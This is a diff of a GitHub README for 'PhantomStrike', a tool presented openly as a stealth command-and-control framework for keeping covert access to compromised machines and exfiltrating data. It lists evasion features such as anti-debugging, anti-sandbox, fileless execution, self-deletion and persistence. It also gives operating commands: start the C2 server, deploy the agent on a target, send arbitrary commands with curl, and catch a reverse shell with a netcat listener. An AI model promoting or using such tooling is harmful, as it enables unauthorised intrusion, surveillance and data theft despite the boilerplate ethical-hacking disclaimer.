Akkaiaj/PhantomStrike/README.md

----

-██████╗ ██╗  ██╗ █████╗ ███╗   ███╗████████╗ ██████╗ ███████╗
-██╔══██╗██║  ██║██╔══██╗████╗ ████║╚══██╔══╝██╔═══██╗██╔════╝
-██████╔╝███████║███████║██╔████╔██║   ██║   ██║   ██║███████╗
-██╔═══╝ ██╔══██║██╔══██║██║╚██╔╝██║   ██║   ██║   ██║╚════██║
-██║     ██║  ██║██║  ██║██║ ╚═╝ ██║   ██║   ╚██████╔╝███████║
-╚═╝     ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝   ╚═╝    ╚═════╝ ╚══════╝

 PhantomStrike - Stealth C2 Framework

+██████╗ ██╗  ██╗ █████╗ ███╗   ███╗ ████████╗ ███████╗
+██╔══██╗██║  ██║██╔══██╗████╗ ████║ ╚══██╔══╝ ██╔════╝
+██████╔╝███████║███████║██╔████╔██║    ██║    █████╗
+██╔═══╝ ██╔══██║██╔══██║██║╚██╔╝██║    ██║    ██╔══╝
+██║     ██║  ██║██║  ██║██║ ╚═╝ ██║    ██║    ███████╗
+╚═╝     ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝    ╚═╝    ╚══════╝

+PhantomStrike - Stealth C2 Framework 🚀

-🚀 Advanced post-exploitation framework for stealth persistence, privilege escalation, and remote control.
+PhantomStrike is an advanced post-exploitation framework designed to provide stealth, persistence, privilege escalation, and remote control capabilities.
+It helps to maintain full access to compromised machines and exfiltrate valuable data while evading detection.

 ---

-🔧 Features
+Features 🔧

-✅ AES Encryption – Secure communication
+AES Encryption: Secure all communications between the agent and the C2 server.

-✅ Stealth Mode – Hides execution traces
+Stealth Mode: Ensures no execution traces are left behind.

-✅ Anti-Debugging – Evades analysis tools
-✅ Reverse Shell – Full remote access
-✅ Fileless Execution – Runs in memory
-✅ Self-Delete – Auto-removes after execution
+Anti-Debugging: Detects debuggers and terminates itself to prevent analysis.

+Reverse Shell: Gain full control of the target system remotely.

+Fileless Execution: Executes payloads entirely in memory, leaving no traces on the disk.

+Self-Delete: The agent deletes itself after execution to prevent detection.

-✅ Persistence Mode – Maintains access after reboots
+Persistence Mode: Ensures that access is maintained even after system reboots.

+Command Execution: Run arbitrary shell commands on the compromised machine.

+Reverse Shell Connection: Establish an interactive reverse shell with the target.

 ---

-📌 Installation
+Installation 📌

-1️⃣ Clone the Repo
+1️⃣ Clone the Repository:

 git clone https://github.com/Akkaiaj/PhantomStrike.git
 cd PhantomStrike

-2️⃣ Install Dependencies
+2️⃣ Install Dependencies:

+Ensure that you have all required libraries installed:

 pip install -r requirements.txt

 ---

-🚀 Usage
+Usage 🚀

 1️⃣ Start the C2 Server (Attacker Machine)

+Run the following command to start the PhantomStrike C2 server on your machine:

 python3 phantom_c2.py

-📌 This will start the Flask-based C2 server.
+📌 This command will launch the Flask-based C2 server and start listening for incoming agent connections.

 ---

 2️⃣ Deploy the Agent (Target Machine)

-Run the agent on the target system:
+To deploy the agent on a compromised system, simply run:

 python3 phantom_agent.py

 📌 This will:

-Connect to the C2 server
+Connect the agent to the C2 server.

-Execute commands sent from C2
+Execute commands sent from the C2 server.

-Start a reverse shell
+Open a reverse shell for remote control.

 ---

+Command & Control 🛠️

-🛠️ Sending Commands
+1️⃣ Sending Commands to the Agent

-From the C2 server, you can send commands to the agent:
+From the C2 server, you can send commands to the connected agent by sending a POST request:

 curl -X POST http://your-server-ip:5000/command -H "Content-Type: application/json" -d '{"command": "whoami"}'

-📌 The agent will execute this command and send back the result.
+📌 The agent will execute the given command and send the results back to the C2 server.

 ---

-🔥 Reverse Shell Usage
+2️⃣ Reverse Shell Usage 🔥

-Once the agent is running, connect to the reverse shell from the C2 machine:
+Once the agent is connected, establish a reverse shell by running:

 nc -lvnp 4444

-📌 Now you have full control over the target system!
+📌 This will give you full control over the target system.

 ---

-🕵️‍♂️ Evasion & Persistence
+Evasion & Persistence 🕵️‍♂️

-Anti-Debugging: Detects debuggers and terminates itself.
+Anti-Debugging: PhantomStrike detects when debuggers are present and terminates to avoid analysis.

-Self-Delete: Deletes itself after execution to remove traces.

-Persistence Mode: Runs at startup for continued access.
+Self-Delete: The agent cleans up after execution, leaving no traces on the disk.

+Persistence Mode: PhantomStrike can be configured to run automatically after system reboots, ensuring continuous access.

 ---

-🛡️ Defensive Measures
+Defensive Measures 🛡️

-Uses AES encryption to secure command communication
+AES Encryption: All communication between the agent and C2 server is encrypted to avoid detection.

+Evasion: The tool implements polymorphic obfuscation to make the payload harder to detect by sandboxing or monitoring tools.

-Evades sandbox detection & monitoring tools
+Anti-Sandbox: PhantomStrike bypasses common sandbox detection mechanisms.

-Implements polymorphic obfuscation for stealth

 ---

-💰 Donate & Support
+Donations 💰

-If you find PhantomStrike useful, consider donating:
+If you find PhantomStrike useful, consider supporting the project to help fund its continuous development:

+*buy me a coffe

 BTC: bc1q0ruwrc4gs465xvu6tcn24h62pclt96sh2yv8pq

 ETH: 0x69B6F3aA9F470d4cBD93CDC4c0A887C0787CEf9B

 SOL: Gk6CmvvS6fi1Nfnu7QEEneshbLkmaE5Ue8sBzxz91D3q

 ---

-💀 Disclaimer

-This tool is for educational and ethical hacking purposes only.
-Unauthorized use is illegal.
+License 📜

+PhantomStrike is open-source software and licensed under the MIT License.
+By using this tool, you agree to the terms of this license.

 ---

-✅ Now update your GitHub repo with this README:

-cd ~/PhantomStrike
-nano README.md  # Replace with new content git add README.md git commit -m "Updated README with detailed usage and ASCII art" git push origin main
+⚠️ Disclaimer

+This tool is intended for educational purposes and ethical hacking only.
+Any unauthorized use of this tool against systems without consent is illegal and unethical.
+Please ensure you have permission to use this tool before deploying it.

+---